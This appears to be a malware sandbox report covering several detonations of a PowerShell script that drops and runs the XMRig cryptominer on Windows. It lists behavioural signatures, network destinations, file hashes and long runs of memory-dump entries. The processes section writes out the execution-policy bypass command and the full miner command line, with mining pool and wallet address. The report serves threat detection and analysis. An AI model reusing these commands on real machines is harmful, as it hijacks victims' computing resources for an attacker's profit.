N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4828-0-0x00007FFCE7FB3000-0x00007FFCE7FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwyzr24o.una.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4828-9-0x000001D3BF890000-0x000001D3BF8B2000-memory.dmp

memory/4828-10-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-11-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-12-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4828-14-0x000001D3BFD90000-0x000001D3BFDA2000-memory.dmp

memory/4828-15-0x000001D3BFB00000-0x000001D3BFB0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4440-46-0x0000025450990000-0x00000254509B0000-memory.dmp

memory/4440-47-0x00000254509D0000-0x00000254509F0000-memory.dmp

memory/4440-48-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4828-50-0x00007FFCE7FB3000-0x00007FFCE7FB5000-memory.dmp

memory/4828-51-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4440-49-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-53-0x00000254509F0000-0x0000025450A10000-memory.dmp

memory/4440-52-0x00000254522C0000-0x00000254522E0000-memory.dmp

memory/4828-54-0x00007FFCE7FB0000-0x00007FFCE8A72000-memory.dmp

memory/4440-55-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-56-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-58-0x00000254509F0000-0x0000025450A10000-memory.dmp

memory/4440-57-0x00000254522C0000-0x00000254522E0000-memory.dmp

memory/4440-59-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-60-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-61-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-62-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-63-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-64-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-65-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-66-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-67-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-68-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-69-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-70-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-71-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-72-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-73-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-74-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-75-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-76-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-77-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-78-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-79-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-80-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-81-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-82-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-83-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-84-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-85-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-86-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-87-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-88-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-89-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-90-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-91-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-92-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-93-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-94-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-95-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-96-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-97-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-98-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-99-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-100-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-101-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-102-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-103-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-104-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-105-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-106-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-107-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-108-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-109-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-110-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-111-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-112-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-113-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-114-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-115-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-116-0x00007FF708240000-0x00007FF708E73000-memory.dmp

memory/4440-117-0x00007FF708240000-0x00007FF708E73000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/876-0-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_risfljkm.gbs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/876-9-0x000001C3E5450000-0x000001C3E5472000-memory.dmp

memory/876-10-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-11-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-12-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/876-14-0x000001C3E5580000-0x000001C3E5592000-memory.dmp

memory/876-15-0x000001C3E5430000-0x000001C3E543A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4612-46-0x000002CA3DD60000-0x000002CA3DD80000-memory.dmp

memory/4612-47-0x000002CA3DF00000-0x000002CA3DF20000-memory.dmp

memory/4612-48-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/876-49-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/4612-50-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-52-0x000002CAD2160000-0x000002CAD2180000-memory.dmp

memory/876-51-0x00007FFF13FF3000-0x00007FFF13FF5000-memory.dmp

memory/4612-53-0x000002CAD2390000-0x000002CAD23B0000-memory.dmp

memory/876-54-0x00007FFF13FF0000-0x00007FFF14AB2000-memory.dmp

memory/4612-55-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-56-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-57-0x000002CAD2160000-0x000002CAD2180000-memory.dmp

memory/4612-58-0x000002CAD2390000-0x000002CAD23B0000-memory.dmp

memory/4612-59-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-60-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-61-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-62-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-63-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-64-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-65-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-66-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-67-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-68-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-69-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-70-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-71-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-72-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-73-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-74-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-75-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-76-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-77-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-78-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-79-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-80-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-81-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-82-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-83-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-84-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-85-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-86-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-87-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-88-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-89-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-90-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-91-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-92-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-93-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-94-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-95-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-96-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-97-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-98-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-99-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-100-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-101-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-102-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-103-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-104-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-105-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-106-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-107-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-108-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-109-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-110-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-111-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-112-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-113-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-114-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-115-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-116-0x00007FF684460000-0x00007FF685093000-memory.dmp

memory/4612-117-0x00007FF684460000-0x00007FF685093000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:26

Platform

win10-20240404-en

Max time kernel

1788s

Max time network

1800s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 9.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/2076-3-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/2076-5-0x000001B16C780000-0x000001B16C7A2000-memory.dmp

memory/2076-8-0x000001B16D0A0000-0x000001B16D116000-memory.dmp

memory/2076-9-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dxlrhyef.idd.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2076-22-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-25-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-48-0x000001B16CD20000-0x000001B16CD32000-memory.dmp

memory/2076-61-0x000001B16C850000-0x000001B16C85A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4176-90-0x000002A9E7240000-0x000002A9E7260000-memory.dmp

memory/2076-91-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-92-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/2076-94-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/4176-93-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-95-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-96-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-97-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-98-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-99-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-100-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-101-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-102-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-103-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-104-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-105-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-106-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-107-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-108-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-109-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-110-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-111-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-112-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-113-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-114-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-115-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-116-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-117-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-118-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-119-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-120-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-121-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-122-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-123-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-124-0x00007FF718200000-0x00007FF718E33000-memory.dmp

memory/4176-125-0x00007FF718200000-0x00007FF718E33000-memory.dmp

